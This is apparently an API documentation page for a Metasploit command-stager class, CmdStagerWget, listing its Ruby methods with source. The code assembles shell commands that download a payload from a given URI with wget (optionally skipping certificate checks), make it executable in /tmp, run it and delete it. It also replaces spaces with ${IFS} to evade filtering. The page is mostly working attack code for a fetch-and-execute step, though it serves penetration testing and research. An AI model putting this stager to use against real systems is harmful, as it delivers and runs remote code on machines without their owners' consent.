Class: Rex::Exploitation::CmdStagerWget
Instance Method Summary
collapse
#encode_payload, #generate_cmds, #initialize, #parts_to_commands, #setup, #slice_up_payload, #teardown
Instance Method Details
#cmd_concat_operator ⇒ Object
58
59
60
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 58
def cmd_concat_operator
';'
end
|
#compress_commands(cmds, opts) ⇒ Object
53
54
55
56
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 53
def compress_commands(cmds, opts)
cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
super
end
|
#generate(opts = {}) ⇒ Object
13
14
15
16
17
18
19
20
21
22
23
24
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 13
def generate(opts = {})
if opts[:payload_uri].nil?
raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
end
opts[:temp] ||= '/tmp'
opts[:file] ||= Rex::Text.rand_text_alpha(8)
opts[:silent] = true if opts[:silent].nil?
@payload_path = "#{opts[:temp]}/#{opts[:file]}"
super
end
|
#generate_cmds_decoder(opts) ⇒ Object
43
44
45
46
47
48
49
50
51
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 43
def generate_cmds_decoder(opts)
cmds = []
cmds << "chmod +x #{@payload_path}"
cmds << @payload_path
cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
cmds
end
|
#generate_cmds_payload(opts) ⇒ Object
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 26
def generate_cmds_payload(opts)
cmds = []
uri = opts[:payload_uri]
ncc = '--no-check-certificate'
silent_flag = opts[:silent] ? 'q' : ''
if opts[:ssl]
cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
else
uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
end
cmds
end
|
#http? ⇒ Boolean
5
6
7
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 5
def http?
true
end
|
#user_agent ⇒ Object
9
10
11
|
# File 'lib/rex/exploitation/cmdstager/wget.rb', line 9
def user_agent
/^Wget/
end
|